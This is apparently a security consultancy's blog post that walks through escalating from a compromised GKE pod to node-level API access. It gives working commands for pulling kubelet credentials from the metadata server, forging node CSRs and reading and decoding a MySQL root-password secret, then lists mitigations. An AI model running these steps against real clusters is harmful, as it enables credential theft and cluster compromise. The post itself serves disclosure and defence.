The kubelet is a critical security boundary in Kubernetes and any successful attack against this component is likely to lead to a wider cluster compromise for most k8s users. In this post we explore how relatively simple it is to exploit the kubelet on Google Kubernetes Engine, in its default configuration.
Introduction
We’re going to discuss attack vectors from inside the GKE cluster. An important caveat: this assumes an attacker already has some form of control over a container running in your cluster and is able to perform somewhat arbitrary actions within that context. Of course, if you’re running a platform that allows customers to run their own workloads, you may be in this position by design.
To keep it relatively restricted and real-world, we’ll use an Alpine Linux container in a pod deployed on a GKE cluster running version 1.9.7-gke.11, which was the default version on GKE at the time of writing. Note that we don’t have root in our container, just to emphasise that we don’t need any special privileges on the container OS for what we’re about to do.
~ $ id
uid=100(app) gid=101(app) groups=101(app)
~ $ pwd
/home/app
Kubelet and its credentials on GKE
The kubelet is a process which runs on each node in your cluster and is responsible for taking PodSpecs from the API server (primarily) and ensuring the containers they describe are running and healthy on that kubelet’s node.
The kubelet needs to talk to the API server for various reasons, including reporting node status. In an RBAC world that means it needs to have credentials. Specifically, the kubelet uses a client certificate with the organisation system:nodes. On the underlying node OS on GKE this is stored under /var/lib/kubelet/pki but, of course, you don’t have access to this from the containers (unless you’re host-mounting - but you’re not, right?).
How does it get there in the first place though? Like most things “cloud”, it comes via instance metadata. GKE supplies an instance attribute called kube-env. There are three values in it that are interesting to us as security testers:
KUBELET_CERT
KUBELET_KEY
CA_CERT
Let’s go see if we can access this metadata from our compromised pod.
~ $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_CERT | awk '{print $2}' | base64 -d > kubelet.crt
~ $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_KEY | awk '{print $2}' | base64 -d > kubelet.key
~ $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt
~ $ ls -l
total 12
-rw-r--r-- 1 app app 1115 Nov 29 17:27 apiserver.crt
-rw-r--r-- 1 app app 1050 Nov 29 17:27 kubelet.crt
-rw-r--r-- 1 app app 1679 Nov 29 17:27 kubelet.key
Looking good. Let’s go access the Kubernetes API as the kubelet. $KUBERNETES_PORT_443_TCP_ADDR is a standard environment variable exposed to all pods, giving the IP address of the master.
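As an aside, rather than passing the certificate flags to every kubectl command (as we do throughout this post to keep each step explicit), you could bundle them into a kubeconfig. A rough sketch, assuming kubectl is available in the pod and using arbitrary names for the cluster, user and context:
~ $ kubectl config --kubeconfig=kc set-cluster gke --server=https://${KUBERNETES_PORT_443_TCP_ADDR} --certificate-authority=apiserver.crt --embed-certs=true
~ $ kubectl config --kubeconfig=kc set-credentials kubelet --client-certificate=kubelet.crt --client-key=kubelet.key --embed-certs=true
~ $ kubectl config --kubeconfig=kc set-context gke --cluster=gke --user=kubelet
~ $ kubectl config --kubeconfig=kc use-context gke
From there, kubectl --kubeconfig=kc would behave the same as the long-form commands below. We’ll stick with explicit flags so each step stands on its own.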
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods --all-namespaces
Error from server (Forbidden): pods is forbidden: User "kubelet" cannot list pods at the cluster scope
Bummer. Why didn’t that work?
Kubelet TLS Bootstrapping
Simplez, actually. These credentials are just bootstrapping credentials that allow access to the CertificateSigningRequest object. The kubelet could also be issued with a token, as seen in kubeadm, but GKE goes with certs. The kubelet uses these bootstrap credentials to submit a certificate signing request (CSR) to the control plane. Use those credentials again but this time, instead of looking for pods, look at the CSRs. You’ll see some for your cluster nodes.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests
NAME AGE REQUESTOR CONDITION
node-csr-0eoGCDTP-Q-UYT7KYh-zBB1_3emr4SG43m1XDomxNUI 157m kubelet Approved,Issued
node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM 28m kubelet Approved,Issued
The kube-controller-manager will, by default, auto-approve certificate signing requests with the organisation system:nodes and a common name prefixed with system:node: and issue a client certificate that the kubelet can then use for its normal functions. This is the certificate we want. Let’s grab one.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM -o yaml
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
creationTimestamp: 2018-11-29T17:03:13Z
name: node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM
resourceVersion: "9462"
selfLink: /apis/certificates.k8s.io/v1beta1/certificatesigningrequests/node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM
uid: a879ecdf-f3f8-11e8-a0f7-42010a80009b
spec:
groups:
- system:authenticated
request: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURSBSRVFVRVNULS0tLS0KTUlJQkVUQ0J1QUlCQURCV01SVXdFd1lEVlFRS0V3eHplWE4wWlcwNmJtOWtaWE14UFRBN0JnTlZCQU1UTkhONQpjM1JsYlRwdWIyUmxPbWRyWlMxamJIVnpkR1Z5TVRrdFpHVm1ZWFZzZEMxd2IyOXNMVFpqTnpOaVpXSXhMWGR0CmFETXdXVEFUQmdjcWhrak9QUUlCQmdncWhrak9QUU1CQndOQ0FBVHJaTkFRZDZGUmlvbmRHYWZVNW81NVN3ZSsKMVQ5cVEwTVMxVFQwNEU0SXpvNVdmaHJoZGJjdFNJb0pkd1piLzdkOFNDSWRTekQrancxMDlSOEM3SWsvb0FBdwpDZ1lJS29aSXpqMEVBd0lEU0FBd1JRSWdLK2JvQkdCNnZ6N0tsNk1odjdHdnRpbWgxclZDVUU2VGRpRSs5Vk5kCkRUY0NJUUR6Zy9kUzF3QUpQQkNDMjVkM05JRVVRWURtbERwbkhJdDZBcXA0SHZyQVFRPT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUgUkVRVUVTVC0tLS0tCg==
usages:
- digital signature
- key encipherment
- client auth
username: kubelet
status:
certificate: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUNWVENDQVQyZ0F3SUJBZ0lSQVAyanRSY3JidUtEYjVSUGN5eHlsNEV3RFFZSktvWklodmNOQVFFTEJRQXcKTHpFdE1Dc0dBMVVFQXhNa00yVTVNV00yT1RjdE9HWXpPUzAwTkRRMUxXRXpNR1V0WkRrd1lqUTJNV1JtTURVeApNQjRYRFRFNE1URXlPVEUzTURNeE0xb1hEVEl6TVRFeU9ERTNNRE14TTFvd1ZqRVZNQk1HQTFVRUNoTU1jM2x6CmRHVnRPbTV2WkdWek1UMHdPd1lEVlFRREV6UnplWE4wWlcwNmJtOWtaVHBuYTJVdFkyeDFjM1JsY2pFNUxXUmwKWm1GMWJIUXRjRzl2YkMwMll6Y3pZbVZpTVMxM2JXZ3pNRmt3RXdZSEtvWkl6ajBDQVFZSUtvWkl6ajBEQVFjRApRZ0FFNjJUUUVIZWhVWXFKM1JtbjFPYU9lVXNIdnRVL2FrTkRFdFUwOU9CT0NNNk9WbjRhNFhXM0xVaUtDWGNHClcvKzNmRWdpSFVzdy9vOE5kUFVmQXV5SlA2TVFNQTR3REFZRFZSMFRBUUgvQkFJd0FEQU5CZ2txaGtpRzl3MEIKQVFzRkFBT0NBUUVBVGJ3empsSDU2bmhqMGJHM0xCUzJVYm1QcURIQ2hmazJGdWlCd0xFUmViK2VFeHBmdmFQegpjSTk4bVJFWUdMYURtS0pvanE1UnJFNTR6TGFwaWxDamorUnFMQmpQV1kyY3A1V21pUHErODBGcUc4ZzJvaXNLCldWTVhRQng3RlV3RkFPNjlFcldBTVFwRkIrNXdBc3lhK1BRQVlrNzljdk1SVUlIdHg1aHFjOHkyMmR1T3dFY20KM1BPamdFMHloY1h2SWI3cGdoMm9pS0RIaERxVjUya1NmNTdpYllPUjdQcUFuOTRNZXRYR1FEQmdybDdQK2JONwpna2tUWUo5SGk4TG50Z2ZNSXFHU2lvSDE1dkhSMGhEL09RandzUVJXTzBQd0RZb0IyS2l5djAwVnlJWllPSEpECmJXbmV6QkdXeElqLzVBbXQwUFJwelptekJiUkJ3bm9NYlE9PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
conditions:
- lastUpdateTime: 2018-11-29T17:03:13Z
message: Auto approving kubelet client certificate after SubjectAccessReview.
reason: AutoApproved
type: Approved
Unsurprisingly the certificate is in the status.certificate field. This is base64 encoded so we’ll decode that.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM -o jsonpath='{.status.certificate}' | base64 -d > node.crt
Awesome. Let’s use it. Note the client-certificate value has been changed to match the file we output to in the previous command - node.crt.
~ $ kubectl --client-certificate node.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods
error: tls: private key type does not match public key type
Oh FFS. Now what? Well, the kubelet bootstrap creates a new private key (with the function LoadOrGenerateKeyFile) before it creates the CSR. It’s almost like they thought of this attack vector. :-)
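If you want to see the mismatch for yourself, you can compare the public key algorithm in the issued certificate with the type of the bootstrap key we pulled from kube-env. A quick sketch using openssl (output omitted here):
~ $ openssl x509 -in node.crt -noout -text | grep 'Public Key Algorithm'
~ $ openssl pkey -in kubelet.key -noout -text | head -n 1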
We can retrieve the certificate but we don’t have the key so we can’t use it. So, we’re stuffed? Nah, of course not. Let’s create our own key, generate a CSR and submit it to the API. :-)
Becoming a node
We can use standard openssl commands to achieve this, then write a manifest to deploy the CSR to the API. If you have a look at that certificate we downloaded, you will see the Subject we need.
~ $ openssl x509 -in node.crt -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            fd:a3:b5:17:2b:6e:e2:83:6f:94:4f:73:2c:72:97:81
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=3e91c697-8f39-4445-a30e-d90b461df051
        Validity
            Not Before: Nov 29 17:03:13 2018 GMT
            Not After : Nov 28 17:03:13 2023 GMT
        Subject: O=system:nodes, CN=system:node:gke-cluster19-default-pool-6c73beb1-wmh3
As mentioned above, the organisation is system:nodes and the common name is system:node: followed by the node name. This is significant and I’ll come back to this later. For now we will use arbitraryname.
~ $ openssl req -nodes -newkey rsa:2048 -keyout k8shack.key -out k8shack.csr -subj "/O=system:nodes/CN=system:node:arbitraryname"
Generating a RSA private key
..................................+++++
.........................................................+++++
writing new private key to 'k8shack.key'
-----
~ $ ls -lrt
total 8
-rw-r--r-- 1 app app 1704 Nov 29 19:25 k8shack.key
-rw-r--r-- 1 app app 944 Nov 29 19:25 k8shack.csr
Now submit this to the API.
~ $ cat <<EOF | kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} create -f -
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
  name: node-csr-$(date +%s)
spec:
  groups:
  - system:nodes
  request: $(cat k8shack.csr | base64 | tr -d '\n')
  usages:
  - digital signature
  - key encipherment
  - client auth
EOF
You will hopefully see something like certificatesigningrequest.certificates.k8s.io/node-csr-1543519800 created. Did it get approved?
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-1543519800
NAME AGE REQUESTOR CONDITION
node-csr-1543519800 111s kubelet Approved,Issued
Yep! Let’s go grab our certificate like we did before.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-1543519800 -o jsonpath='{.status.certificate}' | base64 -d > node2.crt
Now let’s use it to access the apiserver.
~ $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE
gangly-rattlesnake-mysql-master-0 1/1 Running 0 12m 10.32.2.4 gke-cluster19-default-pool-6c73beb1-8cj1 <none>
gangly-rattlesnake-mysql-slave-0 1/1 Running 0 12m 10.32.0.15 gke-cluster19-default-pool-6c73beb1-pf5m <none>
kubeletmein-5464bb8757-kbcfk 1/1 Running 1 71m 10.32.1.6 gke-cluster19-default-pool-6c73beb1-wmh3 <none>
It worked. We now have access to the API as the group system:nodes. This is pretty useful. We can’t exec into pods, which may be your first thought for a next step, but that’s not a massive limitation; it really depends on our goal. We can certainly schedule pods - that’s the kubelet’s whole purpose - and we can also view secrets.
Stealing secrets
We can’t list them….
~ $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secrets
Error from server (Forbidden): secrets is forbidden: User "system:node:arbitraryname" cannot list secrets in the namespace "default": can only get individual resources of this type
…but that’s a minor inconvenience. We just need to find the secret from the pod spec. That MySQL database looks interesting.
~ $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pod gangly-rattlesnake-mysql-master-0 -o yaml
apiVersion: v1
kind: Pod
[..]
spec:
  containers:
  - env:
    - name: MYSQL_ROOT_PASSWORD
      valueFrom:
        secretKeyRef:
          key: mysql-root-password
          name: gangly-rattlesnake-mysql
    - name: MYSQL_DATABASE
I’ve snipped the above output but the secret name can be seen in the env declaration: gangly-rattlesnake-mysql. Let’s grab it.
~ $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secret gangly-rattlesnake-mysql -o yaml
Error from server (Forbidden): secrets "gangly-rattlesnake-mysql" is forbidden: User "system:node:arbitraryname" cannot get secrets in the namespace "default": no path found to object
Remember I said I’d come back to the node name? Now’s the time. The cluster is running Node Authorization, which means a node is only allowed to read the secrets of pods scheduled onto it. This is great as it means we can place pods in our cluster according to sensitivity and not co-locate pods of different risk. As we’ve tried to access this secret with a made-up node name of arbitraryname, we are not authorised: the secret isn’t referenced by any pod on a node of that name.
Dealing with Node Authorization
The solution is simple. Find the node name we need and request a new certificate with the correct node name. Kubernetes does not restrict which nodes can request which certificates.
In the wide output above you can see that the gangly-rattlesnake-mysql-master-0 pod is running on the gke-cluster19-default-pool-6c73beb1-8cj1 node. We need to create a new CSR for this as follows.
~ $ openssl req -nodes -newkey rsa:2048 -keyout k8shack.key -out k8shack.csr -subj "/O=system:nodes/CN=system:node:gke-cluster19-default-pool-6c73beb1-8cj1"
Then submit it to the API server as before.
cat <<EOF | kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} create -f -
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
  name: node-csr-$(date +%s)
spec:
  groups:
  - system:nodes
  request: $(cat k8shack.csr | base64 | tr -d '\n')
  usages:
  - digital signature
  - key encipherment
  - client auth
EOF
certificatesigningrequest.certificates.k8s.io/node-csr-1543524743 created
Then retrieve the cert. I’ll output it to the same node2.crt file so I can just arrow up in my shell and rerun my request for the secret.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-1543524743 -o jsonpath='{.status.certificate}' | base64 -d > node2.crt
Now let’s do this.
~ $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secret gangly-rattlesnake-mysql -o yaml
apiVersion: v1
data:
  mysql-replication-password: T1lVRVI3TDE1Zg==
  mysql-root-password: OXNSWkRZUnZhRQ==
kind: Secret
metadata:
  creationTimestamp: 2018-11-29T20:22:57Z
  labels:
    app: mysql
    chart: mysql-4.2.0
    heritage: Tiller
    release: gangly-rattlesnake
  name: gangly-rattlesnake-mysql
  namespace: default
  resourceVersion: "24460"
  selfLink: /api/v1/namespaces/default/secrets/gangly-rattlesnake-mysql
  uid: 8f19d5fd-f414-11e8-a0f7-42010a80009b
type: Opaque
The secret is base64 encoded, so let’s finish that off.
~ $ echo -n OXNSWkRZUnZhRQ== | base64 -d
9sRZDYRvaE
From here obviously we could connect to the MySQL database and potentially dump out sensitive data. This post is long enough as it is so I’ll leave that as an exercise for the reader. :-)
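Should you want to at least verify the credential works, a one-liner along these lines would do it, assuming a mysql client is available in the pod and that the chart’s service is resolvable as gangly-rattlesnake-mysql (an assumption on my part):
~ $ mysql -h gangly-rattlesnake-mysql -u root -p9sRZDYRvaE -e 'show databases;'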
To simplify the process of generating certs, we’ve created a tool called kubeletmein. More details can be found in our blog post.
Mitigations
Hopefully you can see how important it is to protect the kubelet credentials. Given their importance, it surprises many of our clients how easy they are to obtain. Fortunately, there are steps you can take to mitigate this on GKE and, indeed, securely bootstrapping kubelets into the cluster is an area of active work. It’s not just Google that has this problem, as you’ll see in future posts.
Metadata Protection
Starting in Kubernetes v1.9.3, GKE provides the ability to conceal kube-env (and the instance identity token - more on this in a separate post). At the time of writing there is no option in the Google Cloud console; it has to be set via the command line or API.
The command line parameter is --workload-metadata-from-node=SECURE and more information can be found on Google’s website at https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata#concealment.
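As a rough sketch, creating a cluster with metadata concealment enabled looks something like the following (the cluster name and zone are placeholders, and at the time of writing the flag lives under the beta gcloud surface):
gcloud beta container clusters create cluster19 \
    --zone europe-west2-a \
    --workload-metadata-from-node=SECURE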
From a pod within a cluster with this flag, we now see the following:
~ $ curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env'
This metadata endpoint is concealed.
Needless to say, we highly recommend you configure this on your GKE clusters.
Network Policy
An alternative, and a more universal and robust one, is to implement a Network Policy that denies egress by default and then whitelists outbound traffic only where needed. Network Policy is applied to pods, not to the nodes, and remember it’s the nodes which need to access the API server and metadata, not the pods.
If your application doesn’t need metadata from the cloud environment, just block this outright.
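For example, a policy along these lines allows general egress from all pods in the default namespace but blocks the metadata server at 169.254.169.254. This is only a sketch - the policy name is arbitrary and it assumes a network policy provider (such as Calico) is enabled on the cluster:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-metadata-egress
  namespace: default
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32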
Service Mesh with Egress Gateway
You could implement a service mesh like Istio and enable and configure the Egress Gateway. This will prevent any containers deployed within the service mesh from communicating out to any unauthorised hosts.
Restrict Network Access to Masters
Everything I’ve shown you here has been conducted from inside the cluster; however, once you have the initial bootstrap kubelet credentials, the rest of the attack could be performed from anywhere with access to the API server. This is obviously easier for the attacker and reduces the time needed inside the environment performing activity that may get detected.
While we are big advocates of the zero trust network approach where VPNs are a thing of the past, many Kubernetes attacks could be avoided by restricting access to the master servers. It requires weighing up the pros and cons of course but if you wanted to do it, on GKE there’s an option under Advanced options -> Network security -> Enable master authorised networks where you can specify valid source ranges.
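The same can be set from the command line; a sketch with a placeholder cluster name, zone and CIDR range:
gcloud container clusters update cluster19 \
    --zone europe-west2-a \
    --enable-master-authorized-networks \
    --master-authorized-networks 203.0.113.0/24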
Alternatively, consider a private cluster with public endpoint access disabled and the use of a jumpbox in your VPC to access the API server.
Compute Engine Service Account
The instance attributes are exposed to the Compute Engine instances that form your worker nodes via the metadata service. However, the instance attributes themselves are configured and readable through the Google Cloud Compute Engine API. Until very recently, GKE gave the node instances access to these API scopes by default. I’ll dive into this a bit more in a separate post but restricting this access is an additional, essential step required to ensure a thorough defence against kubelet credential theft.
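As a sketch of the general idea (the pool, cluster and service account names are placeholders), you could run your nodes in a pool that uses a dedicated, least-privilege service account and only the scopes the nodes actually need, rather than the default Compute Engine service account and scopes:
gcloud iam service-accounts create gke-nodes-minimal
gcloud container node-pools create hardened-pool \
    --cluster cluster19 \
    --zone europe-west2-a \
    --service-account gke-nodes-minimal@my-project.iam.gserviceaccount.com \
    --scopes logging-write,monitoring,storage-ro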
Summary
That’s it for this post, I hope you’ve found it useful. If you would like some help ensuring that your Kubernetes clusters are well hardened against attack, please get in touch and we’d be happy to help.